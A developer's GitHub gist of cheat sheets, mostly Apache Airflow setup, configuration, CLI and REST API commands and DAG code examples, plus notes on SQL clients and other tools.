Skip to content

Instantly share code, notes, and snippets.

@eddy-22
Last active May 31, 2025 02:07
Show Gist options
  • Save eddy-22/95a752b7ffa62f3b354a81b751272b54 to your computer and use it in GitHub Desktop.
Save eddy-22/95a752b7ffa62f3b354a81b751272b54 to your computer and use it in GitHub Desktop.
Cheat sheets of ranging topics

cheat sheet

other cheat sheets:

other cheat-tools

useful tools:

useful search function for using whole cheat sheet

function cheat-grep(){
    if [[ $1 == "" ]]; then
        echo "nothing to search"
        return;
    fi

    search_line=""
    for each_input_arg in "$@"; do
        if [[ $search_line == "" ]]; then
            search_line=$each_input_arg
        else
            search_line=$search_line".*"$each_input_arg
        fi
    done

    grep -r $search_line -i -A 2 $HOME_PROJECTS/cheat-sheet/*.md $HOME_PROJECTS/bash-example/*
}

collaboration whiteboard drawing

tools for developers on localhost

  • sdkman

    switch SDK of you favorite language fastly
    show additional info in your console prompt

  • flox

    create virtual environment with dependencies

editor

render/run html/js/javascript files from github

githack.com

  • Development https://raw.githack.com/[user]/[repository]/[branch]/[filename.ext]
  • Production (CDN) https://rawcdn.githack.com/[user]/[repository]/[branch]/[filename.ext] example: https://raw.githack.com/cherkavi/javascripting/master/d3/d3-bar-chart.html

github.io

http://htmlpreview.github.io/?[full path to html page] example http://htmlpreview.github.io/?https://github.com/cherkavi/javascripting/blob/master/d3/d3-bar-chart.html
http://htmlpreview.github.io/?https://github.com/twbs/bootstrap/blob/gh-pages/2.3.2/index.html

rawgit

https://rawgit.com/[user]/[repository]/master/index.html https://rawgit.com/cherkavi/javascripting/master/d3/d3-bar-chart.html

diagram drawing

markdown

regular expressions

stream editor

online coding

code analyser

code changer

database GUI client

database cli clients, sql cli tools, db connect from command line

https://java-source.net/open-source/sql-clients

  • https://hsqldb.org doc download

  • sqlshell download

  • henplus

  • sqlline sqlline doc installation from source

    git clone https://github.com/julianhyde/sqlline.git
    cd sqlline
    git tag
    git checkout sqlline-1.12.0
    mvn package  

    download from maven

    ver=1.12.0
    wget https://repo1.maven.org/maven2/sqlline/sqlline/$ver/sqlline-$ver-jar-with-dependencies.jar

    usage

    java -cp "*" sqlline.SqlLine \
    -n myusername 
    -p supersecretpassword \
    -u "jdbc:oracle:thin:@my.host.name:1521:my-sid"

    usage with db2

    JDBC_SERVER_NAME=cat.zur
    JDBC_DATABASE=TOM_CAT
    JDBC_PORT=8355
    JDBC_USER=jerry
    JDBC_PASSWORD_PLAIN=mousejerry
    JDBC_DRIVER='com.ibm.db2.jcc.DB2Driver'
    java -cp "*" sqlline.SqlLine -n ${JDBC_USER} -p ${JDBC_PASSWORD_PLAIN} -u "jdbc:db2://${JDBC_SERVER_NAME}:${JDBC_PORT}/${JDBC_DATABASE}" -d $JDBC_DRIVER

password storage

text/password exchange

Software test containers/emulators for development

REST api test frameworks

Collection of AI tools

my own AI cheat sheet :TODO: vector database
:TODO: https://github.com/explodinggradients/ragas

AI platforms

chat bots

general purposes tools

Large Language Model ( LLM )

  • Ollama Facebook

RAG

  • Agentic RAG - for creating scalable workflow of tasks
  • Enhancement tools:
    • LangGraph
    • Phoenix Arize
  • G-RAG

Find out

  • Text2SQL
  • Quantization
  • Reranker
  • Table Augmented Generation

Airflow cheat sheet

Airflow alternatives

Key concepts

official documentation of key concepts

  • DAG a graph object representing your data pipeline ( collection of tasks ).
    Should be:
    • idempotent ( execution of many times without side effect )
    • can be retried automatically
    • toggle should be "turned on" on UI for execution
  • Operator describe a single task in your data pipeline
    • action - perform actions ( airflow.operators.BashOperator, airflow.operators.PythonOperator, airflow.operators.EmailOperator... )
    • transfer - move data from one system to another ( SftpOperator, S3FileTransformOperator, MySqlOperator, SqliteOperator, PostgresOperator, MsSqlOperator, OracleOperator, JdbcOperator, airflow.operators.HiveOperator.... ) ( don't use it for BigData - source->executor machine->destination )
    • sensor - waiting for arriving data to predefined location ( airflow.contrib.sensors.file_sensor.FileSensor ) has a method #poke that is calling repeatedly until it returns True
  • Task An instance of an operator
  • Task Instance Represents a specific run of a task = DAG + Task + Point of time
  • Workflow Combination of Dags, Operators, Tasks, TaskInstances

configuration, settings

AIRFLOW_CONFIG - path to apache.cfg environment variables

  • executor/airflow.cfg

    • remove examples from UI (restart) load_examples = False
    • how much time a new DAGs should be picked up from the filesystem, ( dag update python file update ) min_file_process_interval = 0 dag_dir_list_interval = 60
    • authentication ( important for REST api 1.x.x )
      • auth_backend = airflow.api.auth.backend.basic_auth
        AIRFLOW__API__AUTH_BACKEND=airflow.api.auth.backend.basic_auth # for version 2.0.+
      • auth_backend = airflow.api.auth.backend.default
  • variables

     from airflow.models import Variable
     my_var = Variable.set("my_key", "my_value")
  • connections as variables

     from airflow.hooks.base_hook import BaseHook
     my_connection = BaseHook.get_connection("name_of_connection")
     login = my_connection.login
     pass = my_connection.password
  • templating

     {{ var.value.<variable_key> }}
    

Remember, don’t put any get/set of variables outside of tasks.

Architecture overview

single node multi node statuses to scheduled: https://github.com/apache/airflow/blob/866a601b76e219b3c043e1dbbc8fb22300866351/airflow/jobs/scheduler_job.py#L810
from scheduled: https://github.com/apache/airflow/blob/866a601b76e219b3c043e1dbbc8fb22300866351/airflow/jobs/scheduler_job.py#L329
to queued:https://github.com/apache/airflow/blob/866a601b76e219b3c043e1dbbc8fb22300866351/airflow/jobs/scheduler_job.py#L483

task lifecycle

components

  • WebServer
    • read user request
    • UI
  • Scheduler
    • scan folder "%AIRFLOW%/dags" ( config:dag_folder ) and with timeout ( config:dag_dir_list_interval )
    • monitor execution "start_date" ( + "schedule_interval", first run with start_date ), write "execution_date" ( last time executed )
    • create DagRun ( instance of DAG ) and fill DagBag ( with interval config:worker_refresh_interval )
      • start_date ( start_date must be in past, start_date+schedule_interval must be in future )
      • end_date
      • retries
      • retry_delay
      • schedule_interval (cron:str / datetime.timedelta) ( cron presets: @once, @hourly, @daily, @weekly, @monthly, @yearly )
      • catchup ( config:catchup_by_default ) or "BackFill" ( fill previous executions from start_date ) actual for scheduler only ( backfill is possible via command line )
      airflow dags backfill -s 2021-04-01 -e 2021-04-05 --reset_dagruns my_dag_name
      • print snapshot of task state tracked by executor
      pkill -f -USR2 "airflow scheduler"
      
  • Executor ( How task will be executed, how it will be queued )
    • type: LocalExecutor(multiple task in parallel), SequentialExecutor, CeleryExecutor, DaskExecutor
  • Worker ( Where task will be executed )
  • Metadatabase ( task status )
    • types
    • configuration:
      • sql_alchemy_conn
      • sql_alchemy_pool_enabled

installation

# create python virtual env
python3 -m venv airflow-env
source airflow-env/bin/activate

# create folder 
mkdir airflow
export AIRFLOW_HOME=`pwd`/airflow

# install workflow
AIRFLOW_VERSION=2.0.2
PYTHON_VERSION=3.8

pip install apache-airflow==$AIRFLOW_VERSION \
 --constraint "https://raw.githubusercontent.com/apache/airflow/constraints-$AIRFLOW_VERSION/constraints-$PYTHON_VERSION.txt"
 # necessary !!!
 exit 

generate configuration file

airflow

change configuration file

dags_folder = /home/ubuntu/airflow/dags
sql_alchemy_conn = postgresql+psycopg2://airflow:[email protected]:5432/airflow
load_examples=False
dag_dir_list_interval = 30
catchup_by_default = False
auth_backend = airflow.api.auth.backend.basic_auth
expose_config = True
dag_run_conf_overrides_params=True

# hide all Rendered Templates
show_templated_fields=none

[webserver]
instance_name = "title name of web ui"

Airflow start on python nacked start start components start separate components start locally manual start

# installed package
/home/ubuntu/.local/lib/python3.8/site-packages
# full path to airflow
/home/ubuntu/.local/bin/airflow

# init workflow
airflow initdb 
# create user first login
airflow users  create --role Admin --username vitalii --email [email protected] --firstname Vitalii --lastname Cherkashyn --password my_secure_password

# airflow resetdb - for reseting all data 
airflow scheduler &
airflow webserver -p 8080 &
echo "localhost:8080"

# check logs
airflow serve_logs

# sudo apt install sqllite3
# sqllite3 $AIRFLOW_HOME/airflow.db

airflow start

export AIRFLOW_HOME=/home/ubuntu/airflow
export PATH=$PATH:/home/ubuntu/.local/bin
export AIRFLOW__WEBSERVER__INSTANCE_NAME="test-account-01"

nohup airflow webserver -p 8080 --pid $AIRFLOW_HOME/airflow-webserver.pid > $AIRFLOW_HOME/airflow-webserver.log 2>&1 &
nohup airflow scheduler --pid $AIRFLOW_HOME/airflow-scheduler.pid > $AIRFLOW_HOME/airflow-scheduler.log 2>&1 &
nohup airflow celery flower -p 8081  > $AIRFLOW_HOME/airflow-celery-flower.log 2>&1 &

airflow status

ps aux | grep airflow | grep webserver | awk '{print $14}' | grep webserver
ps aux | grep airflow | grep scheduler | awk '{print $15}'
ps aux | grep airflow | grep flower | awk '{print $14}'

airflow stop

ps aux | grep airflow | grep webserver | awk '{print $2}' | xargs -I{} kill -15 {} || echo "webserver removed"
rm $AIRFLOW_HOME/airflow-webserver.pid || echo "not exists"

ps aux | grep airflow | grep scheduler | awk '{print $2}' | xargs -I{} kill -15 {} || echo "scheduler removed"
rm $AIRFLOW_HOME/airflow-scheduler.pid || echo "not exists"

ps aux | grep airflow | grep flower | awk '{print $2}' | xargs -I{} kill -15 {} || echo "flower removed"

airflow reset

# remove dags
rm -rf /home/ubuntu/airflow/dags/*

# remove logs
rm -rf /home/ubuntu/airflow/logs/dag_processor_manager/*
rm -rf /home/ubuntu/airflow/logs/scheduler/*
rm -rf /home/ubuntu/airflow/logs/shopify_collections_create/*
rm -rf /home/ubuntu/airflow/logs/shopify_image_add_product/*
rm -rf /home/ubuntu/airflow/logs/shopify_image_set_variant/*
rm -rf /home/ubuntu/airflow/logs/shopify_product_create/*
rm -rf /home/ubuntu/airflow/logs/shopify_product_delete/*
rm -rf /home/ubuntu/airflow/logs/shopify_product_update/*

# clean up DB !!!
airflow db reset
# !!! all variables after reset should be created again manually 

astro cli

astro dev init
astro dev start
astro dev ps
astro dev stop
# * copy your dags to ``` .dags```
docker-compose -f docker-compose-LocalExecutor.yml up -d
python env create -f environment.yml
source activate airflow-tutorial

credentials

ssh -p 2200 airflow@localhost
# passw: airflow

activate workspace

source .sandbox/bin/activate

update

  1. backup DB
  2. check you DAG for deprecations
  3. upgrade airflow
    pip install "apache-airflow==2.0.1" --constraint constraint-file
  4. upgrade DB
    airflow db upgrade
  5. restart all

commands

check workspace

airflow --help

operator types ( BaseOperator )

  • action
  • transfer ( data )
  • sensor ( waiting for some event )
    • long running task
    • BaseSensorOperator
    • poke method is responsible for waiting

Access to DB

!!! create env variables for securing connection

Admin -> Connections -> postgres_default  
# adjust login, password
Data Profiling->Ad Hoc Query-> postgres_default  
select * from dag_run;

via PostgreConnection

    clear_xcom = PostgresOperator(
        task_id='clear_xcom',
        provide_context=True,
        postgres_conn_id='airflow-postgres',
        trigger_rule="all_done",
        sql="delete from xcom where dag_id LIKE 'my_dag%'",
        dag=dag)

configuration must have "api.auth_backend", for example:

[api]
auth_backend = airflow.api.auth.backend.default  

read DAG runs

AIRFLOW_URL=https://airflow.local
DAG_NAME=xsd_generation
AIRFLOW_ENDPOINT=$AIRFLOW_URL/api/experimental/dags/$DAG_NAME/dag_runs

curl -X GET -u $USER_AIRFLOW:$PASSWORD_AIRFLOW $AIRFLOW_ENDPOINT

trigger DAG - python

import urllib2
import json

AIRFLOW_URL="https://airflow.local/api/experimental/dags/name_of_my_dag/dag_runs"
payload_dict = {"conf": {"dag_param_1": "test value"}}

req = urllib2.Request(AIRFLOW_URL, data=json.dumps(payload_dict))
req.add_header('Content-Type', 'application/json')
req.add_header('Cache-Control', 'no-cache')
req.get_method = lambda: "POST"
f = urllib2.urlopen(req)
print(f.read())

curl request

ENDPOINT="$AIRFLOW_URL/api/v1/dags/notification_send/dagRuns"
BODY='{"conf":{"account_id":"xxx","message_type":"error","message_text":"test_curl"}}'
curl --header "Content-Type: application/json" --data-binary $BODY -u $AIRFLOW_USER:$AIRFLOW_PASSWORD -X POST $ENDPOINT
AIRFLOW_ENDPOINT="https://airflow.local/api/experimental"
AIRFLOW_USER=my_user
AIRFLOW_PASSWORD=my_passw

Airflow REST API request

function airflow-event-delete(){
	if [ -z "$1" ]
	then
	   echo "first argument should have filename"
	   exit 1
	fi
	
	DAG_NAME="shopify_product_delete"
	DAG_RUN_ID="manual_shopify_product_delete_"`date +%Y-%m-%d-%H:%M:%S:%s`
	ENDPOINT="$AIRFLOW_URL/api/v1/dags/$DAG_NAME/dagRuns"
	BODY="{\"conf\":{\"account_id\":\"$ACCOUNT_ID\",\"filename\":\"$1\"},\"dag_run_id\":\"$DAG_RUN_ID\"}"
	echo $BODY
	curl -H "Content-Type: application/json" --data-binary $BODY -u $AIRFLOW_USER:$AIRFLOW_PASSWORD -X POST $ENDPOINT	
}

airflow dag code

class ListComparatorRequest:
    def __init__(self, dag_run_config: Dict):
        self.account_id: str = dag_run_config["account_id"]
        self.filename: str = dag_run_config["filename"]

    def request_object(self) -> Dict:
        return {
            "account_id": self.account_id,
            "filename": self.filename,
        }

    def __str__(self) -> str:
        return f"account_id:{self.account_id} filename:{self.filename}"
	
request: ListComparatorRequest = ListComparatorRequest(context["dag_run"].conf)

airflow test connection

curl -u $AIRFLOW_USER:$AIRFLOW_PASSWORD -X GET "$ENDPOINT/test"

airflow scrab html, airflow download logs, airflow log parsing, airflow log downloader

AIRFLOW_URL="https://airflow.vantage.com"
# target task list url 
AIRFLOW_TASK_LIST="$AIRFLOW_URL/taskinstance/list/?_flt_0_task_id=my_task&_flt_0_state=failed&_oc_TaskInstanceModelView=execution_date&_od_TaskInstanceModelView=desc"
AIRFLOW_HEADER='Cookie: iamlbcookie=01; AMProd=*AAJTSQACM...'
curl "$AIRFLOW_TASK_LIST" -H "$AIRFLOW_HEADER" > out.html
# change /log?-> /get_logs_with_metadata?
# add to the end: &try_number=1&metadata=null
for each_log_url in `cat out.html | hq '//table/tr/td[17]/a/@href' | awk -F 'href=' '{print $2}' | sed 's/\/log\?/\/get_logs_with_metadata/g' | sed -r 's/[\"\,]+//g' | awk '{print $1"&try_number=1&metadata=null"}'`; do
    file_name=`echo $each_log_url | awk -F '[=&]' '{print $2}'`
    curl $each_log_url -H "$AIRFLOW_HEADER" > $file_name
done

airflow cli commandline console command

https://airflow.apache.org/docs/apache-airflow/stable/usage-cli.html

# activation
register-python-argcomplete airflow >> ~/.bashrc
# dag list
airflow list_dags
airflow list_tasks dag_id
airflow trigger_dag my-dag
# triggering
# https://airflow.apache.org/docs/apache-airflow/1.10.2/cli.html
airflow trigger_dag -c ""  dag_id

airflow create dag start dag run dag

doc run in case of removing dag (delete dag) - all metadata will me removed from database

# !!! no spaces in request body !!!
REQUEST_BODY='{"conf":{"session_id":"bff2-08275862a9b0"}}'

# ec2-5-221-68-13.compute-1.amazonaws.com:8080/api/v1/dags/test_dag/dagRuns
curl --data-binary $REQUEST_BODY -H "Content-Type: application/json" -u $AIRFLOW_USER:$AIRFLOW_PASSWORD -X POST $AIRFLOW_URL"/api/v1/dags/$DAG_ID/dagRuns"
# run dag from command line

REQUEST_BODY='{"conf":{"sku":"bff2-08275862a9b0","pool_for_execution":"test_pool2"}}'
DAG_ID="test_dag2"

airflow dags trigger -c $REQUEST_BODY  $DAG_ID

airflow re-run tasks, airflow clear task status

START_TIME=2023-02-07T09:03:16.827376+00:00
END_TIME=2023-02-07T09:06:38.279548+00:00
airflow clear $DAG_NAME -t $TASK_NAME -s $START_TIME -e $END_TIME

airlfow check dag execution

curl -X GET -u $AIRFLOW_USER:$AIRFLOW_PASSWORD "$AIRFLOW_ENDPOINT/dags/$DAG_ID/dagRuns" | jq '.[] | if .state=="running" then . else empty end'

airflow get dag task

curl -u $AIRFLOW_USER:$AIRFLOW_PASSWORD -X GET $AIRFLOW_ENDPOINT"/dags/$DAG_ID/dag_runs/$DATE_DAG_EXEC/tasks/$TASK_ID"

airflow get task url

curl -u $AIRFLOW_USER:$AIRFLOW_PASSWORD -X GET "$AIRFLOW_ENDPOINT/task?dag_id=$DAG_ID&task_id=$TASK_ID&execution_date=$DATE_DAG_EXEC"

airflow get all dag-runs, get list of dag-runs

BODY='{"dag_ids":["shopify_product_create"],"page_limit":30000}'
curl -X POST "$AIRFLOW_URL/api/v1/dags/~/dagRuns/list" -H "Content-Type: application/json" --data-binary $BODY --user "$AIRFLOW_USER:$AIRFLOW_PASSWORD" > dag-runs.json
curl -X GET "$AIRFLOW_URL/api/v1/dags/shopify_product_create/dagRuns" -H "Content-Type: application/json" --data-binary $BODY --user "$AIRFLOW_USER:$AIRFLOW_PASSWORD"

DAG_NAME=shopify_product_create
curl -X GET -u $AIRFLOW_USER:$AIRFLOW_PASSWORD "$AIRFLOW_ENDPOINT/dags/$DAG_NAME/dag_runs"

batch retrieve

BODY='{"dag_ids":["shopify_product_create"]}'
curl -X POST "$AIRFLOW_URL/api/v1/dags/~/dagRuns/list" -H "Content-Type: application/json" --data-binary $BODY --user "$AIRFLOW_USER:$AIRFLOW_PASSWORD" 

DAG_ID=shopify_product_create
TASK_ID=product_create
DAG_RUN_ID=shopify_product_create_2021-06-15T18:59:35.1623783575Z_6062835
alias get_airflow_log='curl -X GET --user "$AIRFLOW_USER:$AIRFLOW_PASSWORD" $AIRFLOW_URL/api/v1/dags/$DAG_ID/dagRuns/$DAG_RUN_ID/taskInstances/$TASK_ID/logs/1'

get list of tasks

BODY='{"dag_ids":["shopify_product_create"],"state":["failed"]}'
curl -X POST "$AIRFLOW_URL/api/v1/dags/~/dagRuns/~/taskInstances/list" -H "Content-Type: application/json" --data-binary $BODY --user "$AIRFLOW_USER:$AIRFLOW_PASSWORD" 

create variable

BODY="{\"key\":\"AWS_ACCESS_KEY_ID\",\"value\":\"${AWS_ACCESS_KEY_ID}\"}"
curl --data-binary $BODY -H  "Content-Type: application/json" --user "$AIRFLOW_USER:$AIRFLOW_PASSWORD" -X POST $CREATE_VAR_ENDPOINT

create pool

curl -X POST "$AIRFLOW_URL/api/v1/pools" -H "Content-Type: application/json" --data '{"name":"product","slots":18}' --user "$AIRFLOW_USER:$AIRFLOW_PASSWORD"

configuration

rewrite configuration with environment variables

example of overwriting configuration from config file by env-variables

[core]
airflow_home='/path/to/airflow'
dags_folder='/path/to/dags'
AIRFLOW__CORE__DAGS_FOLDER='/path/to/new-dags-folder'
AIRFLOW__CORE__AIRFLOW_HOME='/path/to/new-version-of-airflow'

how to speedup airflow core.parallelism

# * maximum number of tasks running across an entire Airflow installation
# * number of physical python processes the scheduler can run, task (processes) that running in parallel 
# scope: Airflow
core.parallelism

dag concurrency

# * max number of tasks that can be running per DAG (across multiple DAG runs)
# * number of tast instances that are running simultaneously per DagRun ( amount of TaskInstances inside one DagRun )
# scope: DAG.task
core.dag_concurrency

max active runs per dag

# * maximum number of active DAG runs, per DAG
# * number of DagRuns - will be concurrency in dag execution, don't use in case of dependencies of dag-runs
# scope: DAG.instance
core.max_active_runs_per_dag
# Only allow one run of this DAG to be running at any given time, default value = core.max_active_runs_per_dag
dag = DAG('my_dag_id', max_active_runs=1)

task concurrency

# Allow a maximum of 10 tasks to be running across a max of 2 active DAG runs
dag = DAG('example2', concurrency=10, max_active_runs=2)
# !!! pool: the pool to execute the task in. Pools can be used to limit parallelism for only a subset of tasks
core.non_pooled_task_slot_count: number of task slots allocated to tasks not running in a pool
scheduler.max_threads: how many threads the scheduler process should use to use to schedule DAGs
celery.worker_concurrency: max number of task instances that a worker will process at a time if using CeleryExecutor
celery.sync_parallelism: number of processes CeleryExecutor should use to sync task state

different configuration of executor

LocalExecutor with PostgreSQL

executor = LocalExecutor
sql_alchemy_conn = postgresql+psycopg2://airflow@localhost:5432/airflow_metadata

CeleryExecutor with PostgreSQL and RabbitMQ ( recommended for prod )

settings

executor = CeleryExecutor
sql_alchemy_conn = postgresql+psycopg2://airflow@localhost:5432/airflow_metadata
# RabbitMQ UI: localhost:15672
broker_url = pyamqp://admin:rabbitmq@localhost/
result_backend = db+postgresql://airflow@localhost:5432/airflow_metadata
worker_log_server_port = 8899

start Celery worker node

# just a start worker process
airflow worker
# start with two child worker process - the same as 'worker_concurrency" in airflow.cfg
airflow worker -c 2
# default pool name: default_pool, default queue name: default 
airflow celery worker --queues default

normal celery worker output log

[2021-07-11 08:23:46,260: INFO/MainProcess] Connected to amqp://dskcfg:**@toad.rmq.cloudamqp.com:5672/dskcf
[2021-07-11 08:23:46,272: INFO/MainProcess] mingle: searching for neighbors
[2021-07-11 08:23:47,304: INFO/MainProcess] mingle: sync with 1 nodes
[2021-07-11 08:23:47,305: INFO/MainProcess] mingle: sync complete
[2021-07-11 08:23:47,344: INFO/MainProcess] celery@airflow-01-worker-01 ready.

** in case of adding/removing Celery Workers - restart Airflow Flower **

DAG

task dependencies in DAG

# Task1 -> Task2 -> Task3
t1.set_downstream(t2);t2.set_downstream(t3)
t1 >> t2 >> t3

t3.set_upstream(t2);t2.set_upstream(t1)
t3 << t2 << t1

from airflow.models.baseoperator import chain, cross_downstream
chain(t1,t2,t3)
cross_downstream([t1,t2], [t3,t4])

# or set multiply dependency 
upstream_tasks = t3.upstream_list
upstream_tasks.append(t2)
upstream_tasks.append(tt1)
upstream_tasks >> t3

task information, task metainformation, task context, exchange

def python_operator_core_func(**context):
   print(context['task_instance'])
   context["dag_run"].conf['dag_run_argument']
   # the same as previous
   # manipulate with task-instance inside custom function, context inside custom function
   //  context['ti'].xcom_push(key="k1", value="v1")
   context.get("ti").xcom_push(key="k1", value="v1")
   
   // and after that pull it and read first value
   // context.get("ti").xcom_pull(task_ids="name_of_task_with_push")[0]
   // context.get("ti").xcom_pull(task_ids=["name_of_task_with_push", "name_another_task_to_push"])[0]
   return "value for saving in xcom" # key - return_value
...   
PythonOperator(task_id="python_example", python_callable=python_operator_core_func, provide_context=True, do_xcom_push=True )

task context without context, task jinja template, jinja macros

magic numbers for jinja template

def out_of_context_function():
   return_value = ("{{ ti.xcom_pull(task_ids='name_of_task_with_push')[0] }}")

retrieve all values from XCOM

from datetime import datetime
from airflow import DAG
from airflow.operators.python_operator import PythonOperator
from airflow.utils.timezone import make_aware
from airflow.models import XCom

def pull_xcom_call(**kwargs):
    # if you need only TaskInstance: pull_xcom_call(ti)
    # !!! hard-coded value 
    execution_date = make_aware(datetime(2020, 7, 24, 23, 45, 17, 00))
    xcom_values = XCom.get_many(dag_ids=["data_pipeline"], include_prior_dates=True, execution_date=execution_date)
    print('XCom.get_many >>>', xcom_values)
    
    get_xcom_with_ti = kwargs['ti'].xcom_pull(dag_id="data_pipeline", include_prior_dates=True)
    print('ti.xcom_pull with include_prior_dates >>>', get_xcom_with_ti)


xcom_pull_task = PythonOperator(
    task_id='xcom_pull_task',
    dag=dag, # here need to set DAG 
    python_callable=pull_xcom_call,
    provide_context=True
)

sub-dags

from airflow.operators.subdag_operator import SubDagOperator
...
subdag_task = SubDagOperator(subdag=DAG(SUBDAG_PARENT_NAME+"."+SUBDAG_NAME,schedule_interval=parent_dag.schedule_interval, start_date=parent_dag.start_date,catchup=False))
...

test task

airflow tasks test my_dag_name my_task_name 2021-04-01

collaboration with external sources via "connections"
Hooks act as an interface to communicate with the external shared resources in a DAG.

XCOM, Cross-communication

GUI: Admin -> Xcoms
Should be manually cleaned up
Exchange information between multiply tasks - "cross communication".

Object must be serializable
Some operators ( BashOperator, SimpleHttpOperator, ... ) have parameter xcom_push=True - last std.output/http.response will be pushed
Some operators (PythonOperator) has ability to "return" value from function ( defined in operator ) - will be automatically pushed to XCOM
Saved in Metadabase, also additional data: "execution_date", "task_id", "dag_id"
"execution_date" means hide(skip) everything( same task_id, dag_id... ) before this date

xcom_push(key="name_of_value", value="some value")
xcom_pull(task_ids="name_of_task_with_push")

task state

if ti.state not in ["success", "failed", "running"]:
    return None

branching, select next step, evaluate next task, condition

!!! don't use "depends_on_past"

def check_for_activated_source():
  # return name ( str ) of the task
  return "mysql_task"

branch_task = BranchPythonOperator(task_id='branch_task', python_callable=check_for_activated_source)
mysql_task 	= BashOperator(task_id='mysql_task', bash_command='echo "MYSQL is activated"')
postgresql_task = BashOperator(task_id='postgresql_task', bash_command='echo "PostgreSQL is activated"')
mongo_task 	= BashOperator(task_id='mongo_task', bash_command='echo "Mongo is activated"')

branch_task >> mysql_task
branch_task >> postgresql_task
branch_task >> mongo_task
# branch_task >> [mongo_task, mysql_task, postgresql_task]

branching with avoiding unexpected run, fix branching

from airflow.operators.python_operator import PythonOperator
from airflow.models.skipmixin import SkipMixin

 def fork_label_determinator(**context):
            decision = context['dag_run'].conf.get('branch', 'default')
	    return "run_task_1"

        all_tasks = set([task1, task2, task3])
        class SelectOperator(PythonOperator, SkipMixin):
            def execute(self, context):
                condition = super().execute(context)
                self.log.info(">>> Condition %s", condition)
                if condition=="run_task_1":
                    self.skip(context['dag_run'], context['ti'].execution_date, list(all_tasks-set([task1,])) )
                    return

        # not working properly - applied workaround
        # fork_label = BranchPythonOperator(
        fork_label = SelectOperator(
            task_id=FORK_LABEL_TASK_ID,
            provide_context=True,
            python_callable=fork_label_determinator,
            dag=dag_subdag
        )

Trigger rules

Task States:

  • succeed
  • skipped
  • failed trigger rules
run_this_first >> branching
branching >> branch_a >> follow_branch_a >> join
branching >> branch_false >> join

default trigger rules

join = DummyOperator(task_id='join', dag=dag, trigger_rule='none_failed_or_skipped')

changed rule

Trigger Rules:

  • default: all_success
  • all_failed
  • all_done
  • one_success
  • one_failed
  • none_failed
  • 'none_skipped'
  • none_failed_or_skipped

Service Level Agreement, SLA

GUI: Browse->SLA Misses

def log_sla_miss(dag, task_list, blocking_task_list, slas, blocking_tis):
    print("SLA was missed on DAG {0}s by task id {1}s with task list: {2} which are " \
	"blocking task id {3}s with task list: {4}".format(dag.dag_id, slas, task_list, blocking_tis, blocking_task_list))

...

# call back function for missed SLA
with DAG('sla_dag', default_args=default_args, sla_miss_callback=log_sla_miss, schedule_interval="*/1 * * * *", catchup=False) as dag:
  t0 = DummyOperator(task_id='t0')
	 t1 = BashOperator(task_id='t1', bash_command='sleep 15', sla=timedelta(seconds=5), retries=0)
 	t0 >> t1

should be placed into "dag" folder ( default: %AIRFLOW%/dag )

  • minimal dag
from airflow import DAG
from datetime import datetime, timedelta

with DAG('airflow_tutorial_v01', 
         start_date=datetime(2015, 12, 1),
         catchup=False
         ) as dag:
    print(dag)
    # next string will not work !!! only for Task/Operators values !!!!
    print("{{ dag_run.conf.get('sku', 'default_value_for_sku') }}" )
from airflow import DAG
from datetime import datetime, timedelta
from airflow.operators.python import PythonOperator
from airflow.utils.dates import days_ago

def print_echo(**context):
    print(context)
    # next string will not work !!! only for Task/Operators values !!!!
    print("{{ dag_run.conf.get('sku', 'default_value_for_sku') }}" )

with DAG('test_dag', 
         start_date=days_ago(100),
         catchup=False,
         schedule_interval=None,
         ) as dag:
    PythonOperator(task_id="print_echo",
                   python_callable=print_echo,
                   provide_context=True,
                   retries=3,
                   retry_delay=timedelta(seconds=30),
                   priority_weight=4,
                   weight_rule=WeightRule.ABSOLUTE, # mandatory for exected priority behavior
                   # dag_run.conf is not working for pool !!!
                   pool="{{ dag_run.conf.get('pool_for_execution', 'default_pool') }}",
                   # retries=3,
                   # retry_delay=timedelta(seconds=30),
                   doc_md="this is doc for task")
# still not working !!!! impossible to select pool via parameters
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.utils.dates import days_ago

dag = DAG("test_dag2", schedule_interval=None, start_date=days_ago(2))
dag_pool="{{ dag_run.conf['pool_for_execution'] }}"
print(dag_pool)
parameterized_task = BashOperator(
    task_id='parameterized_task',
    queue='collections',
    pool=f"{dag_pool}",
    bash_command=f"echo  {dag_pool}",
    dag=dag,
)
print(f">>> {parameterized_task}")
	DEFAULT_ARGS = {
    'owner': 'airflow',
    'depends_on_past': True,
    'start_date': datetime(2015, 12, 1),
    'email_on_failure': False,
    'email_on_retry': False,
    # 'retries': 3,
    # 'retry_delay': timedelta(seconds=30),
}

with DAG(DAG_NAME,
         start_date=datetime(2015, 12, 1),
         catchup=False,
         catchup=True,
         schedule_interval=None,
         max_active_runs=1,
         concurrency=1,
         default_args=DEFAULT_ARGS
         ) as dag:
    PythonOperator(task_id="image_set_variant",
                   python_callable=image_set_variant,
                   provide_context=True,
                   retries=3,
                   retry_delay=timedelta(seconds=30),
                   # retries=3,
                   # retry_delay=timedelta(seconds=30),
	           # https://github.com/apache/airflow/blob/866a601b76e219b3c043e1dbbc8fb22300866351/airflow/jobs/scheduler_job.py#L392
	           # priority_weight=1 default is 1, more high will be executed earlier
                   doc_md="this is doc for task")
# task concurrency
t1 = BaseOperator(pool='my_custom_pool', task_concurrency=12)
  • simple DAG
from airflow import DAG
from datetime import date, timedelta, datetime
from airflow.models import BaseOperator
from airflow.operators.bash_operator import BashOperator
# airflow predefined intervals
from airflow.utils.dates import days_ago

def _hook_failure(error_contect):
  print(error_context)
  
  
# default argument for each task in DAG
default_arguments = {
    'owner': 'airflow'
    ,'retries': 1
    ,'retry_delay': timedelta(minutes=5)
    ,'email_on_failure':True
    ,'email_on_retry':True
    ,'email': "[email protected]" # smtp server must be set up
    ,'on_failure_callback': _hook_failure
}

# when schedule_interval=None, then execution of DAG possible only with direct triggering 
with DAG(dag_id='dummy_echo_dag_10'
          ,default_args=default_arguments
          ,start_date=datetime(2016,1,1) # do not do that: datetime.now() # days_ago(3)
          ,schedule_interval="*/5 * * * *"
    	  ,catchup=False # - will be re-writed from ConfigFile !!!
          ,depends_on_past=False
         ) as dag:
    # not necessary to specify dag=dag, source code inside BaseOperator:
    # self.dag = dag or DagContext.get_current_dag()
    BashOperator(task_id='bash_example', bash_command="date", dag=dag)    
value_from_rest_api_call='{{ dag_run.conf["session_id"] }}'
# or
kwargs['dag_run'].conf.get('session_id', 'default_value_for_session_id')
### connection 
#   Conn id: data_api_connection
# Conn Type: HTTP
#      Host: https://data-portal.devops.org
#     Extra: { "Content-Type": "application/json", "Cookie": "kc-access=eyJhbGci...."}

from datetime import timedelta, datetime

import os
from typing import Dict
